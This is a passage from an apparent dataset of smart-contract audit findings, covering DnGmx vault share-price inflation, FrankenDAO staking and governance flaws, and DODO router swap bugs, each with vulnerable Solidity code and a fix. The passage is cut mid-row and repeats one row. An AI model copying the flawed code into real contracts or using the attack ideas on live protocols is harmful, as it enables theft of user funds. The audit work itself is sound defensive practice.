tests. 
The result is that slippage values will be 10x higher than intended.",Correct MAX_BPS:\\n```\\n- uint256 internal constant MAX_BPS = 1000;\\n+ uint256 internal constant MAX_BPS = 10_000;\\n```\\n,"Unexpected slippage resulting in loss of user funds, likely due to MEV",```\\nuint256 internal constant MAX_BPS = 1000;\\n```\\n +Early depositors to DnGmxSeniorVault can manipulate exchange rates to steal funds from later depositors,medium,"To calculate the exchange rate for shares in DnGmxSeniorVault it divides the total supply of shares by the totalAssets of the vault. The first deposit can mint a very small number of shares then donate aUSDC to the vault to grossly manipulate the share price. When later depositor deposit into the vault they will lose value due to precision loss and the adversary will profit.\\n```\\nfunction convertToShares(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());\\n}\\n```\\n\\nShare exchange rate is calculated using the total supply of shares and the totalAsset. This can lead to exchange rate manipulation. As an example, an adversary can mint a single share, then donate 1e8 aUSDC. Minting the first share established a 1:1 ratio but then donating 1e8 changed the ratio to 1:1e8. 
Now any deposit lower than 1e8 (100 aUSDC) will suffer from precision loss and the attacker's share will benefit from it.\\nThis same vector is present in DnGmxJuniorVault.","Initialize should include a small deposit, such as 1e6 aUSDC that mints the share to a dead address to permanently lock the exchange rate:\\n```\\n aUsdc.approve(address(pool), type(uint256).max);\\n IERC20(asset).approve(address(pool), type(uint256).max);\\n\\n+ deposit(1e6, DEAD_ADDRESS);\\n```\\n",Adversary can effectively steal funds from later users,"```\\nfunction convertToShares(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());\\n}\\n```\\n" +The total community voting power is updated incorrectly when a user delegates.,high,"When a user delegates their voting power from staked tokens, the total community voting power should be updated. But the update logic is not correct, so the total community voting power could be wrong values.\\n```\\n tokenVotingPower[currentDelegate] -= amount;\\n tokenVotingPower[_delegatee] += amount; \\n\\n // If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\n if (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n // If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n } else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n }\\n```\\n\\nWhen the total community voting power is increased in the first if statement, _delegator's token voting power might be positive already and community voting power might be added to total community voting power before.\\nAlso, currentDelegate's token voting power might be still positive after delegation so we shouldn't remove the community voting power this time.","Add 
more conditions to check if the msg.sender delegated or not.\\n```\\n if (_delegator == _delegatee) {\\n if(tokenVotingPower[_delegatee] == amount) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n }\\n if(tokenVotingPower[currentDelegate] == 0) {\\n _updateTotalCommunityVotingPower(currentDelegate, false); \\n }\\n } else if (currentDelegate == _delegator) {\\n if(tokenVotingPower[_delegatee] == amount) {\\n _updateTotalCommunityVotingPower(_delegatee, true);\\n }\\n if(tokenVotingPower[_delegator] == 0) {\\n _updateTotalCommunityVotingPower(_delegator, false); \\n }\\n }\\n```\\n",The total community voting power can be incorrect.,"```\\n tokenVotingPower[currentDelegate] -= amount;\\n tokenVotingPower[_delegatee] += amount; \\n\\n // If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\n if (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n // If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n } else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n }\\n```\\n" +Staking#changeStakeTime and changeStakeAmount are problematic given current staking design,medium,"Staking#changeStakeTime and changeStakeAmount allow the locking bonus to be modified. Any change to this value will cause voting imbalance in the system. If changes result in a lower total bonus then existing stakers will be given a permanent advantage over new stakers. 
If the bonus is increased then existing stakers will be at a disadvantage because they will be locked and unable to realize the new staking bonus.\\n```\\nfunction _stakeToken(uint _tokenId, uint _unlockTime) internal returns (uint) {\\n if (_unlockTime > 0) {\\n unlockTime[_tokenId] = _unlockTime;\\n uint fullStakedTimeBonus = ((_unlockTime - block.timestamp) * stakingSettings.maxStakeBonusAmount) / stakingSettings.maxStakeBonusTime;\\n stakedTimeBonus[_tokenId] = _tokenId < 10000 ? fullStakedTimeBonus : fullStakedTimeBonus / 2;\\n }\\n```\\n\\nWhen a token is staked their stakeTimeBonus is stored. This means that any changes to stakingSettings.maxStakeBonusAmount or stakingSettings.maxStakeBonusTime won't affect tokens that are already stored. Storing the value is essential to prevent changes to the values causing major damage to the voting, but it leads to other more subtle issue when it is changed that will put either existing or new stakers at a disadvantage.\\nExample: User A stake when maxStakeBonusAmount = 10 and stake long enough to get the entire bonus. Now maxStakeBonusAmount is changed to 20. User A is unable to unstake their token right away because it is locked. They are now at a disadvantage because other users can now stake and get a bonus of 20 while they are stuck with only a bonus of 10. Now maxStakeBonusAmount is changed to 5. User A now has an advantage because other users can now only stake for a bonus of 5. If User A never unstakes then they will forever have that advantage over new users.","I recommend implementing a poke function that can be called by any user on any user. 
This function should loop through all tokens (or the tokens specified) and recalculate their voting power based on current multipliers, allowing all users to be normalized to prevent any abuse.",Voting power becomes skewed for users when Staking#changeStakeTime and changeStakeAmount are used,"```\\nfunction _stakeToken(uint _tokenId, uint _unlockTime) internal returns (uint) {\\n if (_unlockTime > 0) {\\n unlockTime[_tokenId] = _unlockTime;\\n uint fullStakedTimeBonus = ((_unlockTime - block.timestamp) * stakingSettings.maxStakeBonusAmount) / stakingSettings.maxStakeBonusTime;\\n stakedTimeBonus[_tokenId] = _tokenId < 10000 ? fullStakedTimeBonus : fullStakedTimeBonus / 2;\\n }\\n```\\n" +Adversary can abuse delegating to lower quorum,medium,"When a user delegates to another user they surrender their community voting power. The quorum threshold for a vote is determined when it is created. Users can artificially lower quorum by delegating to other users then creating a proposal. After it's created they can self delegate and regain all their community voting power to reach quorum easier.\\n```\\n// If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\nif (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n// If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n} else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n}\\n```\\n\\nWhen a user delegates to user other than themselves, they forfeit their community votes and lowers the total number of votes. 
When they self delegate again they will recover all their community voting power.\\n```\\n newProposal.id = newProposalId.toUint96();\\n newProposal.proposer = msg.sender;\\n newProposal.targets = _targets;\\n newProposal.values = _values;\\n newProposal.signatures = _signatures;\\n newProposal.calldatas = _calldatas;\\n\\n //@audit quorum votes locked at creation\\n\\n newProposal.quorumVotes = quorumVotes().toUint24();\\n newProposal.startTime = (block.timestamp + votingDelay).toUint32();\\n newProposal.endTime = (block.timestamp + votingDelay + votingPeriod).toUint32();\\n```\\n\\nWhen a proposal is created the quorum is locked at the time at which it's created. Users can combine these two quirks to abuse the voting.\\nExample:\\nAssume there is 1000 total votes and quorum is 20%. Assume 5 users each have 35 votes, 10 base votes and 25 community votes. In this scenario quorum is 200 votes which they can't achieve. Each user delegates to other users, reducing each of their votes by 25 and reducing the total number of votes of 875. Now they can create a proposal and quorum will now be 175 votes (875*20%). They all self delegate and recover their community votes. Now they can reach quorum and pass their proposal.","One solution would be to add a vote cooldown to users after they delegate, long enough to make sure all active proposals have expired before they're able to vote. 
The other option would be to implement checkpoints.",Users can collude to lower quorum and pass proposal easier,"```\\n// If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\nif (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n// If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n} else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n}\\n```\\n" +castVote can be called by anyone even those without votes,medium,"Governance#castVote can be called by anyone, even users that don't have any votes. Since the voting refund is per address, an adversary could use a large number of addresses to vote with zero votes to drain the vault.\\n```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n 
receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n\\nNowhere in the flow of voting does the function revert if the user calling it doesn't actually have any votes. staking#getVotes won't revert under any circumstances. Governance#_castVote only reverts if 1) the proposal isn't active 2) support > 2 or 3) if the user has already voted. The result is that any user can vote even if they don't have any votes, allowing users to maliciously burn vault funds by voting and claiming the vote refund.",Governance#_castVote should revert if msg.sender doesn't have any votes:\\n```\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n+ if (votes == 0) revert NoVotes();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n```\\n,Vault can be drained maliciously by users with no votes,"```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already 
voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n" +[Tomo-M3] Use safeMint instead of mint for ERC721,medium,"Use safeMint instead of mint for ERC721\\nThe `msg.sender` will be minted as a proof of staking NFT when `_stakeToken()` is called.\\nHowever, if `msg.sender` is a contract address that does not support ERC721, the NFT can be frozen in the contract.\\nAs per the documentation of EIP-721:\\nA wallet/broker/auction application MUST implement the wallet interface if it will accept safe transfers.\\nAs per the documentation of ERC721.sol by Openzeppelin\\n```\\n/**\\n * @dev Mints `tokenId` and transfers it to `to`.\\n *\\n * WARNING: Usage of this method is discouraged, use {_safeMint} whenever possible\\n *\\n * Requirements:\\n *\\n * - `tokenId` must not exist.\\n * - `to` cannot be the zero address.\\n *\\n * Emits a {Transfer} event.\\n */\\nfunction _mint(address to, uint256 tokenId) internal 
virtual {\\n```\\n",Use `safeMint` instead of `mint` to check received address support for ERC721 implementation.,Users possibly lose their NFTs,"```\\n/**\\n * @dev Mints `tokenId` and transfers it to `to`.\\n *\\n * WARNING: Usage of this method is discouraged, use {_safeMint} whenever possible\\n *\\n * Requirements:\\n *\\n * - `tokenId` must not exist.\\n * - `to` cannot be the zero address.\\n *\\n * Emits a {Transfer} event.\\n */\\nfunction _mint(address to, uint256 tokenId) internal virtual {\\n```\\n" +[Medium-1] Hardcoded `monsterMultiplier` in case of `stakedTimeBonus` disregards the updates done to `monsterMultiplier` through `setMonsterMultiplier()`,medium,"[Medium-1] Hardcoded `monsterMultiplier` in case of `stakedTimeBonus` disregards the updates done to `monsterMultiplier` through `setMonsterMultiplier()`\\nFrankenDAO allows users to stake two types of NFTs, `Frankenpunks` and `Frankenmonsters` , one of which is considered more valuable, ie: `Frankenpunks`,\\nThis is achieved by reducing votes applicable for `Frankenmonsters` by `monsterMultiplier`.\\n```\\nfunction getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? 
PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n\\nThis `monsterMultiplier` is initially set as 50 and could be changed by governance proposal.\\n```\\nfunction setMonsterMultiplier(uint _monsterMultiplier) external onlyExecutor {\\n emit MonsterMultiplierChanged(monsterMultiplier = _monsterMultiplier); \\n }\\n```\\n\\nHowever, one piece of code inside the FrankenDAO staking contract doesn't consider this and has a monster multiplier hardcoded.\\n```\\nfunction stake(uint[] calldata _tokenIds, uint _unlockTime) \\n----\\nfunction _stakeToken(uint _tokenId, uint _unlockTime) internal returns (uint) {\\n if (_unlockTime > 0) {\\n --------\\n stakedTimeBonus[_tokenId] = _tokenId < 10000 ? **fullStakedTimeBonus : fullStakedTimeBonus / 2;** \\n }\\n--------\\n```\\n\\nHence any update done to `monsterMultiplier` would not reflect in the calculation of `stakedTimeBonus`, and thereby votes.",Consider replacing the hardcoded value with monsterMultiplier,"Any update done to monsterMultiplier would not be reflected in stakedTimeBonus; it would always remain as /2 or 50%.\\nLikelihood: Medium\\nOne needs to pass a governance proposal to change the monster multiplier, so this is definitely not a high likelihood; it's not low as well, as there is a clear provision in spec regarding this.","```\\nfunction getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? 
PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n" +`getCommunityVotingPower` doesn't calculate voting Power correctly due to precision loss,medium,"In `Staking.sol`, the getCommunityVotingPower function, doesn't calculate the votes correctly due to precision loss.\\nIn getCommunityVotingPower function, the `return` statement is where the mistake lies in:\\n```\\n return \\n (votes * cpMultipliers.votes / PERCENT) + \\n (proposalsCreated * cpMultipliers.proposalsCreated / PERCENT) + \\n (proposalsPassed * cpMultipliers.proposalsPassed / PERCENT);\\n```\\n\\nHere, after each multiplication by the `Multipliers`, we immediately divide it by `PERCENT`. Every time we do a division, there is a certain amount of precision loss. And when its done thrice, the loss just accumulates. So instead, the division by `PERCENT` should be done after all 3 terms are added together.\\nNote that this loss is not there, if the `Multipliers` are a multiple of `PERCENT`. But these values can be changed through governance later. So its better to be careful assuming that they may not always be a multiple of `PERCENT`.",Do the division once after all terms are added together:\\n```\\n return \\n ( (votes * cpMultipliers.votes) + \\n (proposalsCreated * cpMultipliers.proposalsCreated) + \\n (proposalsPassed * cpMultipliers.proposalsPassed) ) / PERCENT;\\n }\\n```\\n,The community voting power of the user is calculated wrongly.,```\\n return \\n (votes * cpMultipliers.votes / PERCENT) + \\n (proposalsCreated * cpMultipliers.proposalsCreated / PERCENT) + \\n (proposalsPassed * cpMultipliers.proposalsPassed / PERCENT);\\n```\\n +Delegate can keep can keep delegatee trapped indefinitely,medium,"Users are allowed to delegate their votes to other users. 
Since staking does not implement checkpoints, users are not allowed to delegate or unstake during an active proposal if their delegate has already voted. A malicious delegate can abuse this by creating proposals so that there is always an active proposal and their delegatees are always locked to them.\\n```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n\\nThe above modifier is applied when unstaking or delegating. This reverts if the delegate of msg.sender either has voted or currently has an open proposal. The result is that under those conditions, the delegatee cannot unstake or delegate. A malicious delegate can abuse these conditions to keep their delegatees forever delegated to them. They would keep opening proposals so that delegatees could never unstake or delegate. A single user can only have one proposal open at a time, so they would use a secondary account to alternate and always keep an active proposal.","There should be a function to emergency eject the token from staking. 
To prevent abuse a token that has been emergency ejected should be blacklisted from staking again for a certain cooldown period, such as the length of current voting period.",Delegatees can never unstake or delegate to anyone else,"```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n" +Rounding error when call function `dodoMultiswap()` can lead to revert of transaction or fund of user,medium,"The calculation of the proportion when do the split swap in function `_multiSwap` doesn't care about the rounding error\\nThe amount of `midToken` will be transfered to the each adapter can be calculated by formula `curAmount = curTotalAmount * weight / totalWeight`\\n```\\nif (assetFrom[i - 1] == address(this)) {\\n uint256 curAmount = curTotalAmount * curPoolInfo.weight / curTotalWeight;\\n\\n\\n if (curPoolInfo.poolEdition == 1) {\\n //For using transferFrom pool (like dodoV1, Curve), pool call transferFrom function to get tokens from adapter\\n IERC20(midToken[i]).transfer(curPoolInfo.adapter, curAmount);\\n } else {\\n //For using transfer pool (like dodoV2), pool determine swapAmount through balanceOf(Token) - reserve\\n IERC20(midToken[i]).transfer(curPoolInfo.pool, curAmount);\\n }\\n}\\n```\\n\\nIt will lead to some scenarios when `curTotalAmount * curPoolInfo.weight` is not divisible by `curTotalWeight`, there will be some token left after the swap.\\nFor some tx, if user set a `minReturnAmount` strictly, it may incur the reversion. 
For some token with small decimal and high value, it can make a big loss for the sender.","Add a accumulation variable to maintain the total amount is transfered after each split swap. In the last split swap, instead of calculating the `curAmount` by formula above, just take the remaining amount to swap.",Revert the transaction because not enough amount of `toToken`\\nSender can lose a small amount of tokens,"```\\nif (assetFrom[i - 1] == address(this)) {\\n uint256 curAmount = curTotalAmount * curPoolInfo.weight / curTotalWeight;\\n\\n\\n if (curPoolInfo.poolEdition == 1) {\\n //For using transferFrom pool (like dodoV1, Curve), pool call transferFrom function to get tokens from adapter\\n IERC20(midToken[i]).transfer(curPoolInfo.adapter, curAmount);\\n } else {\\n //For using transfer pool (like dodoV2), pool determine swapAmount through balanceOf(Token) - reserve\\n IERC20(midToken[i]).transfer(curPoolInfo.pool, curAmount);\\n }\\n}\\n```\\n" +Issue when handling native ETH trade and WETH trade in DODO RouterProxy#externalSwap,medium,"Lack of logic to wrap the native ETH to WETH in function externalSwap\\nThe function exeternalSwap can handle external swaps with 0x, 1inch and paraswap or other external resources.\\n```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], ""DODORouteProxy: Not Whitelist Contract""); \\n require(isApproveWhiteListedContract[approveTarget], ""DODORouteProxy: Not Whitelist Appprove Contract""); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n 
IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nnote the code above, if the fromToken is set to _ETH_ADDRESS, indicating the user wants to trade with native ETH pair. the function does has payable modifier and user can send ETH along when calling this function.\\nHowever, the toTokenOriginBalance is check the only WETH balance instead of ETH balance.\\n```\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nThen we do the swap:\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? 
fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nIf the fromToken is _ETH_ADDRESS, we send the user supplied fromTokenAmount without verifying that the fromTokenAmount.\\nFinally, we use the before and after balance to get the amount with received.\\n```\\n// calculate toToken amount\\n if(toToken != _ETH_ADDRESS_) {\\n receiveAmount = IERC20(toToken).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n } else {\\n receiveAmount = IERC20(_WETH_).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n }\\n```\\n\\nWe are checking the WETH amount instead of ETH amount again.\\nThe issue is that some trades may settle the trade in native ETH, for example\\nwe can look into the Paraswap contract\\nIf we click the implementation contract and see the method swapOnUniswapV2Fork\\nCode line 927 - 944, which calls the function\\n```\\nfunction swapOnUniswapV2Fork(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] calldata pools\\n)\\n external\\n payable\\n{\\n _swap(\\n tokenIn,\\n amountIn,\\n amountOutMin,\\n weth,\\n pools\\n );\\n}\\n```\\n\\nwhich calls:\\n```\\n function _swap(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] memory pools\\n )\\n private\\n returns (uint256 tokensBought)\\n {\\n uint256 pairs = pools.length;\\n\\n require(pairs != 0, ""At least one pool required"");\\n\\n bool tokensBoughtEth;\\n\\n if (tokenIn == ETH_IDENTIFIER) {\\n require(amountIn == msg.value, ""Incorrect msg.value"");\\n IWETH(weth).deposit{value: msg.value}();\\n require(IWETH(weth).transfer(address(pools[0]), msg.value));\\n } else {\\n require(msg.value == 0, ""Incorrect msg.value"");\\n transferTokens(tokenIn, msg.sender, address(pools[0]), amountIn);\\n tokensBoughtEth = weth != address(0);\\n }\\n\\n tokensBought = amountIn;\\n\\n for (uint256 i = 0; i < pairs; ++i) {\\n uint256 p = pools[i];\\n address pool = address(p);\\n bool direction = p & 
DIRECTION_FLAG == 0;\\n\\n tokensBought = NewUniswapV2Lib.getAmountOut(\\n tokensBought, pool, direction, p FEE_OFFSET\\n );\\n (uint256 amount0Out, uint256 amount1Out) = direction\\n ? (uint256(0), tokensBought) : (tokensBought, uint256(0));\\n IUniswapV2Pair(pool).swap(\\n amount0Out,\\n amount1Out,\\n i + 1 == pairs\\n ? (tokensBoughtEth ? address(this) : msg.sender)\\n : address(pools[i + 1]),\\n """"\\n );\\n }\\n\\n if (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n }\\n\\n require(tokensBought >= amountOutMin, ""UniswapV2Router: INSUFFICIENT_OUTPUT_AMOUNT"");\\n }\\n```\\n\\nas can clearly see, the code first receive ETH, wrap ETH to WETH, then instead end, unwrap the WETH to ETH and the send the ETH back to complete the trade.\\n```\\nif (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n}\\n```\\n\\nIn DODORouterProxy.sol#ExternalSwap however, we are using WETH balance before and after to check the received amount,\\nbut if we call swapOnUniswapV2Fork on Paraswap router, the balance change for WETH would be 0\\nbecause as we see above, the method on paraswap side wrap ETH to WETH but in the end unwrap WETH and send ETH back.\\nThere is also a lack of a method to wrap the ETH to WETH before the trade. 
making the ETH-related order not tradeable.","Issue when handling native ETH trade and WETH trade in DODO RouterProxy#externalSwap\\nWe recommend the project change from\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_ETH_ADDRESS).universalBalanceOf(address(this));\\n }\\n```\\n\\nIf we want to use WETH to do the balance check, we can help the user wrap the ETH to WETH by calling before do the balance check.\\n```\\nIWETH(_WETH_).deposit(receiveAmount);\\n```\\n\\nIf we want to use WETH as the reference to trade, we also need to approve external contract to spend our WETH.\\nWe can add\\n```\\nif(fromToken == _ETH_ADDRESS) {\\n IERC20(_WETH_).universalApproveMax(approveTarget, fromTokenAmount);\\n}\\n```\\n\\nWe also need to verify the fromTokenAmount for\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? 
fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nwe can add the check:\\n```\\nrequire(msg.value == fromTokenAmount, ""invalid ETH amount"");\\n```\\n",A lot of method that does not use WETH to settle the trade will not be callable.,"```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], ""DODORouteProxy: Not Whitelist Contract""); \\n require(isApproveWhiteListedContract[approveTarget], ""DODORouteProxy: Not Whitelist Appprove Contract""); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n" +Issue when handling native ETH trade and WETH trade in DODO RouterProxy#externalSwap,medium,"Lack of logic to wrap the native ETH to WETH in function externalSwap\\nThe function exeternalSwap can handle external swaps with 0x, 1inch and paraswap or other external resources.\\n```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n 
require(isWhiteListedContract[swapTarget], ""DODORouteProxy: Not Whitelist Contract""); \\n require(isApproveWhiteListedContract[approveTarget], ""DODORouteProxy: Not Whitelist Appprove Contract""); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nnote the code above, if the fromToken is set to _ETH_ADDRESS, indicating the user wants to trade with native ETH pair. the function does has payable modifier and user can send ETH along when calling this function.\\nHowever, the toTokenOriginBalance is check the only WETH balance instead of ETH balance.\\n```\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nThen we do the swap:\\n```\\n(bool success, bytes 